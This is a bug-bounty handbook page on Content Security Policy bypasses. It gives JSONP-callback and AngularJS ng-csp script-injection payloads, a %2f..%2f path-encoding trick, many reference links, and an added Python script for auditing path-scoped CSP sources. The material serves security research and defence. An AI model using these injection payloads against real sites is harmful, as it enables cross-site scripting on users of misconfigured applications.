Bug Hunter Handbook
CSP Bypass

Last updated 6 months ago
  • Bypassing CSP through hosts the policy already allows: a JSONP endpoint on a whitelisted origin reflects the callback name as script, and a whitelisted copy of AngularJS evaluates expressions from markup even under ng-csp:
    <script src="https://trustedsite/jsonp?callback=payload"></script>
    <script src="https://trustedsite/angularjs/1.1.3/angularjs.min.js"></script>
    <div ng-app ng-csp id=p ng-click=$event.view.alert(1)>

  • JSONP can be a serious security vulnerability. Another good read from my colleague :)

Articles:

https://ritiksahni.me/content-security-policy
https://twitter.com/CurtBraz/status/1180372698167435265
#JSONP #AngularJS #BugBountyTip
Accessing cross-site data using JSONP (sjoerdlangkemper.nl)
https://medium.com/@bhaveshthakur2015/content-security-policy-csp-bypass-techniques-e3fa475bfe5d
If CSP policy points to a dir and you use %2f to encode "/", it is still considered to be inside the dir. All browsers seem to agree on that. This leads to a possible bypass, by using "%2f..%2f" if server decodes it, example: https://jsbin.com/werevijewa/edit?html,output…
http://ghostlulz.com/content-security-policy-csp-bypasses/
https://github.com/zigoo0/JSONBee
https://github.com/m4ll0k/Bug-Bounty-Toolz/blob/master/csp-host-checker.py
https://addons.mozilla.org/en-US/firefox/addon/laboratory-by-mozilla/
https://2018.zeronights.ru/wp-content/uploads/materials/3%20ZN2018%20WV%20-%20CSP%20bypass.pdf
https://dropbox.tech/security/unsafe-inline-and-nonce-deployment
https://lab.wallarm.com/how-to-trick-csp-in-letting-you-run-whatever-you-want-73cb5ff428aa/
https://scotthelme.co.uk/content-security-policy-an-introduction/
https://scotthelme.co.uk/csp-cheat-sheet/
https://barryvanveen.nl/blog/47-how-to-prevent-the-use-of-unsafe-inline-in-csp
https://www.netsparker.com/blog/web-security/negative-impact-incorrect-csp-implementations/
https://content-security-policy.com/unsafe-inline/
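The %2f note above (the browser matches a path-scoped CSP source segment by segment before percent-decoding, while a server that decodes first sees "../") can be checked mechanically. This is an added example, not code from the handbook or from any tool it links; the host names, paths and the `audit` helper are constructed placeholders, and it models both views so a server-side guard can reject requests whose decoded path escapes the directory the policy was scoped to:

```python
# Added example (not from the handbook): model the browser's CSP path matching
# against a server that percent-decodes and normalises the same request path.
# Host names and paths below are constructed placeholders.
import posixpath
from urllib.parse import unquote, urlsplit


def csp_path_matches(source_path: str, url_path: str) -> bool:
    """Approximate CSP Level 3 path-part matching: the URL path is split on
    literal '/' before any percent-decoding, so an encoded %2f never starts a
    new segment; a source path ending in '/' is a prefix match."""
    if source_path in ("", "/"):
        return True
    exact = not source_path.endswith("/")
    src = [unquote(p) for p in source_path.strip("/").split("/")]
    url = [unquote(p) for p in url_path.lstrip("/").split("/")]
    if len(src) > len(url) or (exact and len(src) != len(url)):
        return False
    return src == url[: len(src)]


def server_path(url_path: str) -> str:
    """What a permissive server serves: decode first, then collapse '..'."""
    return posixpath.normpath(unquote(url_path))


def escapes_directory(dir_prefix: str, url_path: str) -> bool:
    """Server-side guard: True when the decoded, normalised path leaves the
    directory the raw request path appears to live in. Reject such requests
    so that a path-scoped CSP source keeps its meaning."""
    prefix = dir_prefix.rstrip("/") + "/"
    return not server_path(url_path).startswith(prefix)


def audit(csp_source: str, script_url: str) -> dict:
    """Compare the browser's view (does CSP allow this URL?) with the
    server's view (does the decoded path stay inside the allowed dir?)."""
    src, req = urlsplit(csp_source), urlsplit(script_url)
    # The URL parser removes literal dot segments before CSP matching but
    # leaves %2f untouched; normpath on the raw path approximates that.
    browser_path = posixpath.normpath(req.path) if req.path else ""
    allowed = src.netloc == req.netloc and csp_path_matches(src.path, browser_path)
    escaped = escapes_directory(src.path, req.path)
    return {"csp_allows": allowed, "escapes_dir": escaped,
            "bypass_risk": allowed and escaped}


if __name__ == "__main__":
    # Constructed policy: script-src https://trustedsite.example/lib/
    print(audit("https://trustedsite.example/lib/",
                "https://trustedsite.example/lib/%2f..%2fupload/x.js"))
```

A request is only safe when both views agree it stays under the allowed directory; the guard in `escapes_directory` is the check to put in front of any handler that serves files from a path the CSP names.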